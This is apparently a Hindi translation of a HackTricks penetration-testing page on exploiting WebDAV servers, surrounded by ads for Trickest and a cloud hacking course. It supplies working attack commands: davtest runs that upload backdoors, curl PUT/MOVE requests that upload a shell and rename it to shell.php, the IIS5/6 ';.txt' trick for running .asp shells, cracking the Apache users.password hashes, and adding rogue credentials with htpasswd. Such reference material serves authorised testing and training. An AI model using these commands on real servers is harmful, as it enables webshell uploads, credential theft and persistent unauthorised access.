WebDav

Trickest का उपयोग करें और आसानी से विश्व के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित कार्यप्रवाह बनाएं। आज ही पहुंचें:

शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

HTTP सर्वर के साथ WebDav सक्षम होने पर, यदि आपके पास सही प्रमाणीकरण है, तो फ़ाइलों को मानिबंधित करना संभव है, जो आम तौर पर HTTP बेसिक प्रमाणीकरण के माध्यम से सत्यापित किया जाता है। ऐसे सर्वर पर नियंत्रण प्राप्त करना अक्सर वेबशेल को अपलोड और क्रियान्वयन शामिल होता है।

वेबडैव सर्वर तक पहुंचने के लिए आम तौर पर वैध प्रमाणीकरण की आवश्यकता होती है, जिसे WebDav ब्रूटफ़ोर्स उन्हें प्राप्त करने का एक सामान्य तरीका है।

फ़ाइल अपलोड पर प्रतिबंधों को पार करने के लिए, विशेषकर उन्हें जो सर्वर-साइड स्क्रिप्टों का क्रियान्वयन रोक रहे हैं, आप:

  • अपलोड करें क्रियाशील एक्सटेंशन वाली फ़ाइलें सीधे अगर प्रतिबंधित नहीं हैं।

  • अपलोड की गई गैर-क्रियाशील फ़ाइलों (जैसे .txt) को एक क्रियाशील एक्सटेंशन में बदलें।

  • अपलोड की गई गैर-क्रियाशील फ़ाइलों की प्रतिलिपि बनाएं, जिनका एक्सटेंशन क्रियाशील है।

DavTest

Davtest को विभिन्न एक्सटेंशन वाली कई फ़ाइलें अपलोड करने की कोशिश करेगा और यह जांचेगा कि क्या एक्सटेंशन क्रियान्वित है:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

यह नहीं मतलब है कि .txt और .html एक्सटेंशन्स को एक्सीक्यूट किया जा रहा है। यह मतलब है कि आप इन फ़ाइलों तक वेब के माध्यम से पहुँच सकते हैं

Cadaver

आप इस टूल का उपयोग कर सकते हैं ताकि आप वेबडैव सर्वर से कनेक्ट करें और कार्रवाई (जैसे अपलोड, मूव या डिलीट) मैन्युअली कर सकें।

cadaver <IP>

PUT अनुरोध

curl -T 'shell.txt' 'http://$ip'

MOVE अनुरोध

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Trickest का उपयोग करें और आसानी से ऑटोमेट वर्कफ़्लो बनाएं जो दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित हैं। आज ही पहुंच प्राप्त करें:

IIS5/6 WebDav दुरुपयोग

यह दुरुपयोग बहुत दिलचस्प है। WebDav .asp एक्सटेंशन वाले फ़ाइलों को अपलोड या नाम बदलने की अनुमति नहीं देता है। लेकिन आप इसे बाईपास कर सकते हैं नाम के अंत में ";.txt" जोड़कर और फ़ाइल .asp फ़ाइल के रूप में चलाई जाएगी (आप ".txt" की बजाय ".html" भी उपयोग कर सकते हैं लेकिन ";" मत भूलें।)

फिर आप अपनी शैल को ".txt" फ़ाइल के रूप में अपलोड कर सकते हैं और इसे ".asp;.txt" फ़ाइल में कॉपी/मूव कर सकते हैं। और उस फ़ाइल को वेब सर्वर के माध्यम से एक्सेस करते हैं, तो यह चलाई जाएगी (cadaver बताएगा कि मूव क्रिया काम नहीं कर रही थी, लेकिन यह काम कर गई थी)।

पोस्ट क्रेडेंशियल्स

अगर Webdav एक Apache सर्वर का उपयोग कर रहा था तो आपको Apache में कॉन्फ़िगर की गई साइटों पर नज़र डालनी चाहिए। सामान्यत: /etc/apache2/sites-enabled/000-default

इसके अंदर आप कुछ इस प्रकार का कुछ पा सकते हैं:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

जैसा कि आप देख सकते हैं, यहाँ webdav सर्वर के लिए मान्य प्रमाण-पत्र वाले फ़ाइल हैं:

/etc/apache2/users.password

इस प्रकार के फ़ाइलों में आपको उपयोगकर्ता नाम और पासवर्ड का हैश मिलेगा। ये क्रेडेंशियल्स हैं जिन्हें वेबडैव सर्वर उपयोगकर्ताओं की प्रमाणिकता सत्यापित करने के लिए उपयोग कर रहा है।

आप इन्हें क्रैक करने की कोशिश कर सकते हैं, या अगर किसी कारणवश आप वेबडैव सर्वर तक पहुँचना चाहते हैं तो और भी जोड़ सकते हैं:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

यदि नए क्रेडेंशियल काम कर रहे हैं या नहीं, तो आप निम्नलिखित कर सकते हैं:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Trickest का उपयोग करें और आसानी से वर्कफ़्लो बनाएं और सबसे उन्नत समुदाय उपकरणों द्वारा संचालित करें। आज ही पहुंचें:

Last updated